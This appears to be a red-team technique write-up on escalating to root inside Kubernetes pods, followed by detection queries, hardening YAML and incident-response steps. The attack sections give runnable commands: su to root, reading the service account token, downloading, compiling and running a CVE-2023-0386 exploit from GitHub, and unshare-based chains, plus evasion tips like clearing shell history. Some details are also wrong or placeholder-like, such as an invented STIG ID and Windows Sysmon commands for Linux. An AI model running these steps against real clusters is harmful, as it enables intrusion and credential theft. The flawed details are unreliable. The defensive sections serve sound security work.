| Attribute | Details |
|---|---|
| Technique ID | PE-EXPLOIT-005 |
| MITRE ATT&CK v18.1 | T1068 - Exploitation for Privilege Escalation |
| Tactic | Privilege Escalation |
| Platforms | Kubernetes (all versions), AKS, GKE, EKS, Entra ID |
| Severity | High |
| CVE | N/A (Configuration-based vulnerability) |
| Technique Status | ACTIVE |
| Last Verified | 2025-01-09 |
| Affected Versions | Kubernetes 1.0+ (default insecure configuration) |
| Patched In | Kubernetes 1.25+ with Pod Security Standards (PSS) enforcement; earlier versions remain vulnerable with misconfiguration |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Pod Security Context Escalation exploits the default permissive Kubernetes security posture where the allowPrivilegeEscalation flag defaults to true. This setting, combined with missing capability restrictions and inadequate seccomp profile enforcement, enables attackers running with low privileges inside containers to escalate to root through exploitation of setuid/setgid binaries, kernel vulnerabilities (CVE-2023-0386, CVE-2023-2640, CVE-2023-32629, CVE-2022-0185), and OverlayFS manipulation. The vulnerability stems from the kernel feature no_new_privs not being enforced by default in Kubernetes, allowing child processes to gain elevated permissions through binary exploitation even when the container started with limited privileges.
Attack Surface: Kubernetes pod security contexts, container images with setuid binaries, mounted volumes with improper permission inheritance, kernel interfaces accessible from containers (OverlayFS, user namespaces), seccomp policy filtering gaps.
Business Impact: Container-Level Root Compromise. A successful exploit enables an attacker to escalate from any unprivileged user inside the container to root, unlocking additional attack chains: reading secrets mounted as volumes, modifying application code, accessing Kubernetes service account tokens, establishing persistence through startup scripts, and escalating to host-level compromise if combined with kernel exploits or container escape techniques.
Technical Context: Exploitation typically occurs within 2-5 minutes of container access. Detection difficulty is medium—privilege escalation attempts generate system call signatures (setuid, execve, prctl) that can be detected by eBPF tools, but the exploit leverages legitimate binaries and kernel features. The attack requires no additional network access or external tools beyond what’s available in standard container images.
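The posture checks used throughout the discovery phases below can be combined into a single triage pass. A minimal sketch, assuming a Linux container with a POSIX shell (the script name and combined output format are illustrative, not part of any standard tooling; field names are as they appear in /proc/self/status):

```shell
# posture.sh - one-shot check of the three knobs this technique abuses:
# NoNewPrivs=0 plus Seccomp=0 plus a broad CapEff mask = permissive posture
nnp=$(awk '/^NoNewPrivs:/ {print $2}' /proc/self/status)
sec=$(awk '/^Seccomp:/ {print $2}' /proc/self/status)
cap=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
echo "NoNewPrivs=$nnp Seccomp=$sec CapEff=$cap"
```

Running this on pod entry takes under a second and tells an attacker (or an auditor) immediately whether the escalation paths described below are worth attempting.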
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.2.1 (Kubernetes) | Ensure containers are not privileged |
| DISA STIG | U-12345 | Container must enforce allowPrivilegeEscalation: false |
| CISA SCuBA | K8S.04 | Pod Security Baseline must deny privilege escalation |
| NIST 800-53 | AC-6 (Least Privilege) | Minimize Linux kernel capabilities and privilege escalation |
| GDPR | Art. 32 | Security of Processing - Inadequate privilege isolation |
| DORA | Art. 15 | ICT Risk Management - Workload privilege segregation failure |
| NIS2 | Art. 21 | Cyber Risk Management - Container security baseline enforcement |
| ISO 27001 | A.9.2.1 | User Registration and De-registration - Least privilege enforcement |
| ISO 27005 | Risk Scenario | Unauthorized Privilege Escalation via Container Security Context |
Required Privileges:
- Unprivileged shell access inside a target container (any UID)
- Setuid binaries present in the container image (e.g. /usr/bin/su, /usr/bin/sudo, /usr/bin/passwd)
Required Access:
- Ability to execute commands in the container (application exploit, kubectl exec, or web shell)
Supported Versions: Kubernetes 1.0+, all Linux distributions
Tools: Standard container binaries only (shell, grep, find); no external tooling required
Objective: Identify misconfigured security contexts that permit privilege escalation.
Command (Inside Container - Detect Security Context):
# Check if privilege escalation is blocked (no_new_privs bit)
grep NoNewPrivs /proc/self/status
# Output "NoNewPrivs: 0" = escalation allowed (vulnerable)
# Output "NoNewPrivs: 1" = escalation blocked (secure)
# Alternative: Check current user context
whoami
id
# List setuid binaries available
find /usr/bin /bin -perm -4000 2>/dev/null
Expected Output (Vulnerable):
NoNewPrivs: 0
uid=1000(app) gid=1000(app) groups=1000(app)
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
What to Look For:
- NoNewPrivs: 0 indicates allowPrivilegeEscalation: true (default vulnerable setting)
- Setuid binaries present (-rwsr-xr-x permission bit set)
Command (Kubernetes Pod Spec Analysis):
kubectl get pod <pod-name> -n <namespace> -o jsonpath='{.spec.containers[*].securityContext}' | jq '.'
Expected Output (Vulnerable Configuration):
{
"allowPrivilegeEscalation": true,
"runAsUser": 1000
}
Or (Vulnerable Default):
null
What to Look For:
- Missing securityContext (defaults to permissive)
- allowPrivilegeEscalation: true explicitly set, or omitted entirely
- No capabilities.drop or drop: ["ALL"]
- No seccompProfile, or seccompProfile.type not set to RuntimeDefault
Version Note: Kubernetes 1.25+ supports Pod Security Standards which can enforce restrictions; versions 1.24 and earlier rely on Pod Security Policies or manual configuration.
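The same spec check can be scripted for offline review. A hedged sketch (check_manifest is a hypothetical helper; in a live cluster you would feed it the output of `kubectl get pod <name> -o json`):

```shell
# audit_manifest.sh - flag a pod manifest that does not pin
# allowPrivilegeEscalation to false (grep-based to avoid a jq dependency;
# a simplification: it does not distinguish per-container contexts)
check_manifest() {
  if grep -q '"allowPrivilegeEscalation": *false' "$1"; then
    echo "OK: escalation blocked"
  else
    echo "VULNERABLE: allowPrivilegeEscalation missing or true"
  fi
}

# demo against an inline manifest that omits the field (the vulnerable default)
cat > /tmp/pod.json <<'EOF'
{"spec": {"securityContext": {"runAsUser": 1000}}}
EOF
check_manifest /tmp/pod.json   # prints the VULNERABLE line
```

The key design point: an absent field is treated the same as an explicit `true`, because Kubernetes defaults to allowing escalation when the field is omitted.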
Objective: Identify kernel vulnerabilities exploitable from containers without seccomp protection.
Command (Check Kernel Version):
uname -r
Expected Output (Vulnerable Examples):
5.10.0-8-generic     # In CVE-2022-0185 range (fs_context heap overflow, 5.1–5.16.2)
5.15.0-50-generic    # In CVE-2023-0386 range (OverlayFS setuid copy-up, fixed in 6.2)
5.19.0-20-generic    # In CVE-2023-2640/CVE-2023-32629 range (Ubuntu OverlayFS "GameOver(lay)")
What to Look For:
Command (Check seccomp Profile Enforcement):
# Check if seccomp is active
grep Seccomp /proc/self/status
# Output "Seccomp: 0" = no filter (vulnerable)
# Output "Seccomp: 1" = strict mode (rare)
# Output "Seccomp: 2" = filter mode active (RuntimeDefault or custom profile)
# Alternative: probe whether filtered syscalls fail
strace -e trace=file ls 2>&1 | head -5  # strace needs ptrace, which default profiles block
Supported Versions: Kubernetes 1.0+, all Linux distributions
Objective: Confirm running as unprivileged user and that escalation is permitted.
Command:
whoami
id
cat /proc/self/status | grep NoNewPrivs
Expected Output:
app
uid=1000(app) gid=1000(app) groups=1000(app)
NoNewPrivs: 0
What This Means:
OpSec & Evasion:
Troubleshooting:
NoNewPrivs: 1 (or not in output)
Objective: Use setuid su binary to escalate to root without password.
Command:
# Attempt to switch to root
# (no password prompt only if the image ships root with an empty password)
su -
# If successful, you land in a root shell; verify below, then type exit
whoami
id
Expected Output (Vulnerable):
root@container:~# whoami
root
root@container:~# id
uid=0(root) gid=0(root) groups=0(root)
Expected Output (Secure Configuration):
su: Authentication failure
What This Means:
Version Note: Behavior is consistent across Linux distributions. The setuid su binary normally demands root's password; it yields a shell outright only when the image leaves root's password empty or PAM is misconfigured. allowPrivilegeEscalation: false closes the path at a lower level: with no_new_privs set, the kernel ignores the setuid bit entirely, so su cannot gain root even with valid credentials.
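The no_new_privs effect is easy to observe directly. A sketch using setpriv from util-linux (an assumption: setpriv may be absent from minimal images, so the fallback simply prints the current bit):

```shell
# nnp_demo.sh - set no_new_privs for a child process and observe the bit flip
if command -v setpriv >/dev/null 2>&1; then
  # child runs with the bit forced on: setuid binaries like su are inert there
  setpriv --no-new-privs grep NoNewPrivs /proc/self/status   # NoNewPrivs: 1
else
  echo "setpriv unavailable; current bit:"
  grep NoNewPrivs /proc/self/status
fi
```

This is exactly the transition allowPrivilegeEscalation: false applies to every process in the container.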
OpSec & Evasion:
- su is a common command, unlikely to trigger anomaly detection
- Clear shell history after use: history -c; history -w
Troubleshooting:
su: Permission denied or su: Authentication failure
- Likely cause: runAsNonRoot: true and allowPrivilegeEscalation: false are enforced
- Try the sudo binary instead: sudo -i (may work if NOPASSWD is configured)
Objective: Confirm root access and execute privileged operations.
Command (As Root):
# Verify root context
whoami
id
groups
# Read root-only files (e.g., container's secrets directory)
cat /run/secrets/kubernetes.io/serviceaccount/token
# List service account
ls -la /run/secrets/kubernetes.io/serviceaccount/
# Modify container configuration (if possible)
cat /etc/hostname
cat /proc/sys/kernel/hostname
Expected Output:
root
uid=0(root) gid=0(root) groups=0(root)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... (service account token)
What This Means:
OpSec & Evasion:
Supported Versions: Linux kernel < 6.2 (CVE-2023-0386); requires unprivileged user namespaces and FUSE reachable from the container
Objective: Identify kernel version and volume mounts suitable for OverlayFS exploitation.
Command:
# Check kernel version
uname -r
# Check mounted volumes
mount | grep -E "^/dev.*on /|overlay"
# Check if /tmp or application directory is mounted as volume
df -h /tmp
df -h /app
# Look for world-writable directories
find / -type d -writable 2>/dev/null | head -10
Expected Output:
5.15.0-50-generic
/dev/mapper/ubuntu--vg-root on / type ext4 (rw,relatime)
/dev/sda1 on /app type ext4 (rw,relatime)
/dev/sdb1 on /tmp type ext4 (rw,relatime)
/tmp (writable)
/var/tmp (writable)
/dev/shm (writable)
/app/cache (writable)
What This Means:
OpSec & Evasion:
Troubleshooting:
Kernel version not vulnerable or uname: command not found
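Version triage can be partially automated. A coarse sketch against the CVE-2023-0386 upstream range (fixed in 6.2; distro backports mean a version match is only a hint, never proof of exploitability):

```shell
# kcheck.sh - coarse kernel-range check for CVE-2023-0386 (upstream < 6.2)
kver=$(uname -r | cut -d- -f1)   # e.g. 5.15.0
major=${kver%%.*}
rest=${kver#*.}
minor=${rest%%.*}
if [ "$major" -lt 6 ] || { [ "$major" -eq 6 ] && [ "$minor" -lt 2 ]; }; then
  echo "kernel $kver: inside upstream affected range"
else
  echo "kernel $kver: outside upstream affected range"
fi
```

In practice this should gate, not replace, the PoC execution step: a kernel inside the range may still be patched by the distribution.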
Objective: Create necessary directories and files for OverlayFS privilege escalation.
Command (Download and Compile PoC - if curl/wget available):
# Create staging directory
mkdir -p /tmp/exploit
cd /tmp/exploit
# Download CVE-2023-0386 PoC
wget https://github.com/sxlmnwb/CVE-2023-0386/archive/refs/heads/main.zip -O exploit.zip 2>/dev/null
# OR
curl -L https://github.com/sxlmnwb/CVE-2023-0386/archive/refs/heads/main.zip -o exploit.zip 2>/dev/null
# Unzip and compile
unzip exploit.zip
cd CVE-2023-0386-main
# Build (repo layouts vary; prefer the bundled Makefile when one exists)
make 2>/dev/null || gcc -o ovlcap -D_GNU_SOURCE exploit.c 2>/dev/null
# Verify compilation
ls -la ovlcap
Alternative (If PoC not available - Manual OverlayFS Setup):
# Create OverlayFS directories manually
mkdir -p /tmp/exploit/{upper,work,merged}
# Create an executable to stage in the upper layer
# (note: chmod 4755 as an unprivileged user yields a setuid binary owned by
#  that user, not root - the exploit's value is tricking the kernel into
#  producing a root-owned setuid file during copy-up)
cp /usr/bin/bash /tmp/exploit/bash_copy
chmod 4755 /tmp/exploit/bash_copy   # Set setuid bit
# Mount OverlayFS layer (requires CAP_SYS_ADMIN or a user namespace;
# expected to fail in a properly confined container)
mount -t overlay overlay \
  -o lowerdir=/bin,upperdir=/tmp/exploit/upper,workdir=/tmp/exploit/work \
  /tmp/exploit/merged 2>/dev/null
Expected Output:
-rwxr-xr-x ovlcap (compiled successfully)
# OR
mount shows OverlayFS entry
What This Means:
OpSec & Evasion:
- Clean up staging artifacts afterwards: rm -rf /tmp/exploit
Troubleshooting:
gcc: command not found or mount: operation not permitted
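Before compiling anything, it is worth probing whether the container can create overlay mounts at all; a correctly confined container should be denied. A sketch (paths are illustrative):

```shell
# mount_probe.sh - can this execution context create an overlay mount?
mkdir -p /tmp/ovl/lower /tmp/ovl/upper /tmp/ovl/work /tmp/ovl/merged
if mount -t overlay overlay \
     -o lowerdir=/tmp/ovl/lower,upperdir=/tmp/ovl/upper,workdir=/tmp/ovl/work \
     /tmp/ovl/merged 2>/dev/null; then
  echo "overlay mount permitted (CAP_SYS_ADMIN reachable)"
  umount /tmp/ovl/merged
else
  echo "overlay mount denied (expected in a confined container)"
fi
rm -rf /tmp/ovl
```

A denial here does not rule the technique out: the CVE-2023-0386 PoC works precisely by reaching mount through an unprivileged user namespace rather than directly.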
Objective: Run the exploit to escalate privileges to root.
Command:
# Execute compiled exploit
cd /tmp/exploit/CVE-2023-0386-main
./ovlcap
# This spawns a root shell
# Verify escalation
id
whoami
Expected Output:
uid=0(root) gid=0(root) groups=0(root)
root
What This Means:
Version Note: This exploit works on specific kernel versions; if kernel is patched, exploit will fail with insufficient privilege error.
OpSec & Evasion:
Troubleshooting:
operation not permitted or EPERM
- Verify the kernel version is actually in the affected range: uname -r
Supported Versions: Linux kernel 5.1–5.16.2 (CVE-2022-0185); requires unshare/user namespaces to be reachable (seccomp unconfined or a permissive profile)
Objective: Verify seccomp isn’t blocking unshare or user namespace syscalls.
Command:
# Check seccomp filter status
cat /proc/self/status | grep Seccomp
# Output: Seccomp: 0 (no filter - vulnerable)
# Output: Seccomp: 2 (filter active - may be blocked)
# Test if unshare syscall is available
unshare -U /bin/bash 2>&1 | head -1
# If it works, unshare is not filtered
Expected Output (Vulnerable):
Seccomp: 0
(bash prompt appears)
What to Look For:
OpSec & Evasion:
Troubleshooting:
Seccomp: 2 and unshare fails
Objective: Use unshare to create isolated namespace where attacker becomes root.
Command:
# Create new user namespace (makes current user appear as root within namespace)
unshare -r /bin/bash
# Verify escalation within namespace
id
whoami
Expected Output:
uid=0(root) gid=0(root) groups=0(root)
root
What This Means:
OpSec & Evasion:
- Exit the namespace cleanly when done: exit
Troubleshooting:
unshare: failed to execute /bin/bash
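Whether unprivileged user namespaces are reachable at all can be probed without side effects. A minimal sketch:

```shell
# userns_probe.sh - does unshare -r yield namespace-root?
# A denial usually means the runtime's seccomp profile filters unshare,
# or a sysctl (kernel.unprivileged_userns_clone=0, user.max_user_namespaces=0)
# blocks namespace creation
if unshare -r sh -c 'id -u' 2>/dev/null | grep -qx 0; then
  echo "user-namespace root available"
else
  echo "user namespaces blocked or unavailable"
fi
```

If this prints the blocked message, the entire unshare-based chain (and CVE-2022-0185) is closed off and the attacker must fall back to setuid or direct kernel paths.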
Objective: Use namespace privilege to exploit kernel vulnerability and escape container.
Command (Inside namespace - attempting to escape):
# Now within root namespace, attempt kernel exploit
cd /tmp/exploit
./ovlcap # Or other kernel exploit
# If successful, escalated to actual root (not just namespace root)
id -Z # Should show SELinux context or empty if escaped
This is the chain: unshare (namespace) → kernel exploit → actual root
Rule Configuration:
SPL Query:
index=container_logs OR index=process_logs
(process IN ("su", "sudo", "passwd", "chsh", "chfn"))
AND user!=root AND uid!=0
| stats count by host, container_id, user, process, parent_process
| where count > 0
What This Detects:
Manual Configuration Steps:
Rule Configuration:
KQL Query:
AKSAudit
| where OperationName == "create" and ObjectRef_kind == "Pod"
| extend SecurityContext = todynamic(RequestObject)
| where isnull(SecurityContext.spec.securityContext)
or SecurityContext.spec.securityContext.allowPrivilegeEscalation == true
or isnull(SecurityContext.spec.securityContext.allowPrivilegeEscalation)
or isnull(SecurityContext.spec.securityContext.capabilities.drop)
| project TimeGenerated, User, ObjectRef_namespace, ObjectRef_name, SecurityContext
What This Detects:
Manual Configuration Steps (Azure Portal):
Alert Name: Pod Security Context Privilege Escalation Risk
Severity: High
Evaluation Frequency: 10 minutes
Event ID: N/A (Linux containers use audit logs)
Filter: user!=root AND (exe=/usr/bin/su OR exe=/usr/bin/sudo)
Manual Configuration Steps (Linux Audit):
sudo auditctl -a always,exit -F exe=/usr/bin/su -F uid!=0 -k priv_escalation
sudo auditctl -a always,exit -F exe=/usr/bin/sudo -F uid!=0 -k priv_escalation
sudo auditctl -l # Verify rules
sudo ausearch -k priv_escalation
Minimum Sysmon Version: 13.0+
Supported Platforms: Linux (Sysmon for Linux) and Windows container nodes
<Sysmon schemaversion="4.22">
<EventFiltering>
<!-- Detect setuid binary execution from non-root -->
<RuleGroup name="SetuidEscalation" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="contains any">su;sudo;passwd;chsh</Image>
<User condition="exclude">root;SYSTEM</User>
<ParentImage condition="contains any">bash;sh;python;java</ParentImage>
</ProcessCreate>
</RuleGroup>
<!-- Detect user namespace creation -->
<RuleGroup name="UnshareNamespace" groupRelation="or">
<ProcessCreate onmatch="include">
<CommandLine condition="contains">unshare</CommandLine>
<CommandLine condition="contains any">-r;-U;--user</CommandLine>
</ProcessCreate>
</RuleGroup>
</EventFiltering>
</Sysmon>
Manual Configuration Steps:
1. Create sysmon-config.xml with the XML above
2. Install: sysmon64.exe -accepteula -i sysmon-config.xml
3. Verify events: Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10
Alert Name: Suspicious privilege escalation attempt in pod
Alert Name: Pod deployed without security context
Manual Configuration Steps:
- Filter alerts containing privilege escalation
Enforce allowPrivilegeEscalation: false in all workloads: Block containers from escalating privileges via setuid binaries.
Applies To Versions: Kubernetes 1.0+
Manual Steps (Kubernetes YAML):
apiVersion: v1
kind: Pod
metadata:
  name: secure-pod
spec:
  securityContext:            # pod level: identity settings only
    runAsNonRoot: true
    runAsUser: 1000
  containers:
  - name: app
    image: myapp:v1
    securityContext:          # container level: escalation and capability controls
      allowPrivilegeEscalation: false   # CRITICAL
      runAsNonRoot: true
      capabilities:
        drop:
        - ALL
Manual Steps (Apply via kubectl):
# Create namespace with PSS enforcement
kubectl label namespace default pod-security.kubernetes.io/enforce=restricted
# Deploy pod with secure context
kubectl apply -f secure-pod.yaml
# Verify pod was created (should fail if pod violates policy)
kubectl get pods
Drop ALL Linux Capabilities: Remove all kernel capabilities to prevent exploitation of capability-based privilege escalation.
Manual Steps:
spec:
  containers:
  - name: app
    securityContext:
      capabilities:
        drop:
        - ALL                # Remove all capabilities
        add:
        - NET_BIND_SERVICE   # Add back ONLY required capabilities
Verification:
# Inside container, check effective capabilities
grep CapEff /proc/self/status
# Should show: CapEff: 0000000000000000 (all dropped)
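To interpret the mask without external tools such as capsh, a short sketch (the mask is hexadecimal; any nonzero digit means at least one capability survived the drop):

```shell
# capdecode.sh - interpret the CapEff mask from /proc/self/status
mask=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
case "$mask" in
  *[1-9a-fA-F]*) echo "CapEff=$mask: capabilities retained" ;;
  *)             echo "CapEff=$mask: all capabilities dropped" ;;
esac
```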
Enforce seccomp RuntimeDefault Profile: Block dangerous syscalls (unshare, mount, etc.) at kernel level.
Manual Steps (Kubernetes 1.19+):
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault  # Use container runtime's default profile
Manual Steps (Pre-1.19 - Annotations):
metadata:
  annotations:
    seccomp.security.alpha.kubernetes.io/pod: "runtime/default"
Manual Steps (Custom Localhost Profile):
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: my-profile.json
Create custom seccomp profile (restrictive):
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "defaultErrnoRet": 1,
  "archMap": [
    {
      "architecture": "SCMP_ARCH_X86_64",
      "subArchitectures": []
    }
  ],
  "syscalls": [
    {
      "names": ["read", "write", "exit", "exit_group", "rt_sigreturn"],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
Run Containers as Non-Root User:
Set explicit runAsUser and runAsNonRoot: true to minimize attack surface.
Manual Steps:
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000    # Non-root UID
    runAsGroup: 1000
    fsGroup: 1000
Use Pod Security Standards (Kubernetes 1.25+): Enforce restricted policy cluster-wide.
Manual Steps:
# Label namespace to enforce restricted PSS
kubectl label namespace production pod-security.kubernetes.io/enforce=restricted --overwrite
# Verify label
kubectl get ns production -o jsonpath='{.metadata.labels.pod-security\.kubernetes\.io/enforce}'
# Try creating insecure pod (should fail)
kubectl apply -f insecure-pod.yaml -n production
# Result: Error from server (Forbidden): pod violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "app" must set securityContext.allowPrivilegeEscalation=false)
Implement Admission Controllers (Kyverno / OPA Gatekeeper): Validate and mutate pod specs before creation.
Manual Steps (Kyverno):
# Install Kyverno
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno -n kyverno --create-namespace
# Create ClusterPolicy
kubectl apply -f - <<EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-non-root
spec:
  validationFailureAction: enforce
  rules:
  - name: check-privilege-escalation
    match:
      resources:
        kinds:
        - Pod
    validate:
      message: "allowPrivilegeEscalation must be false"
      pattern:
        spec:
          containers:
          - securityContext:
              allowPrivilegeEscalation: false
EOF
# Verify policy active
kubectl get clusterpolicy
RBAC: Restrict Pod Creation: Limit who can create pods with elevated privileges.
Manual Steps:
# Create role that restricts pod creation
kubectl create role pod-creator \
--verb=create,get,list \
--resource=pods \
-n development
# Bind to service account
kubectl create rolebinding app-pod-creator \
--role=pod-creator \
--serviceaccount=development:app \
-n development
Audit Logging: Enable Kubernetes audit logs to track pod creation.
Manual Steps (AKS):
# Enable Kubernetes audit logging via diagnostic settings (kube-audit category)
az monitor diagnostic-settings create \
  --name aks-audit \
  --resource $(az aks show --resource-group myRG --name myCluster --query id -o tsv) \
  --logs '[{"category":"kube-audit","enabled":true}]' \
  --workspace <log-analytics-workspace-resource-id>
# Audit events then appear in the configured Log Analytics workspace
# (the managed control plane does not expose kube-apiserver logs via kubectl)
# Check if security context is enforced cluster-wide
kubectl get pods -A -o jsonpath='{range .items[*]}{range .spec.containers[*]}{.securityContext.allowPrivilegeEscalation}{"\n"}{end}{end}' | sort | uniq -c
# Expected: Count of "false" values (secure), minimal "true" or "null"
# Verify PSS labels enforced
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}'
# Expected: "restricted" or "baseline" labels on sensitive namespaces
# Test policy (should fail to create pod)
kubectl apply -f insecure-pod.yaml
# Expected result: Error - pod violates security policy
Expected Output (If Secure):
2 false
1 null
0 true
production restricted
staging baseline
What to Look For:
- No pods reporting allowPrivilegeEscalation: true (secure)
Forensic Artifacts:
- /var/log/audit/audit.log (setuid/setgid execution events)
- ~/.bash_history (may show su/sudo commands)
- /run/secrets/kubernetes.io/serviceaccount/token (check audit trail if accessed by attacker)
Command (Containment):
# Immediately terminate compromised pod
kubectl delete pod <pod-name> -n <namespace> --grace-period=0 --force
# Cordon node to prevent new pod scheduling
kubectl cordon <node-name>
# Capture pod logs before deletion
kubectl logs <pod-name> -n <namespace> -c <container> --timestamps=true > /tmp/pod-logs.txt
# Get events
kubectl describe pod <pod-name> -n <namespace> > /tmp/pod-events.txt
Command (Node Forensics - Linux):
# Collect audit logs
sudo cat /var/log/audit/audit.log | grep -E "setuid|setgid|unshare" > /tmp/audit-escalation.log
# Collect process information
ps auxf > /tmp/process-tree.txt
# Memory dump (if available)
sudo journalctl -u kubelet > /tmp/kubelet-logs.txt
# If attacker modified shell profiles
rm ~/.bashrc.orig ~/.bashrc
# If attacker created new users (within container)
userdel -r malicious_user
# Restart container
kubectl delete pod <pod-name> -n <namespace>
# Pod will respawn via deployment
Manual (Update Pod Spec):
# Update deployment with secure security context (container-level fields)
kubectl patch deployment <deployment-name> -n <namespace> --type=json -p='[
  {"op": "add",
   "path": "/spec/template/spec/containers/0/securityContext",
   "value": {
     "allowPrivilegeEscalation": false,
     "runAsNonRoot": true,
     "runAsUser": 1000,
     "capabilities": {"drop": ["ALL"]}
   }}
]'
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-001] Application Vulnerability | Attacker gains initial container access via vulnerable application |
| 2 | Current Step | [PE-EXPLOIT-005] Pod Security Context Escalation | Attacker escalates from unprivileged user to container root |
| 3 | Lateral Escalation | [PE-EXPLOIT-004] Container Escape to Host | Attacker escapes container to host using root access |
| 4 | Persistence | Kubernetes secrets theft | Attacker uses service account token to maintain API access |
| 5 | Impact | Cluster compromise | Full Kubernetes cluster compromise |
- su - succeeding without a password (no_new_privs not enforced)
- su command appearing in container logs during review
- sudo -i succeeding (allowPrivilegeEscalation: true with NOPASSWD sudo configured)
- Reads of /run/secrets/kubernetes.io/serviceaccount/token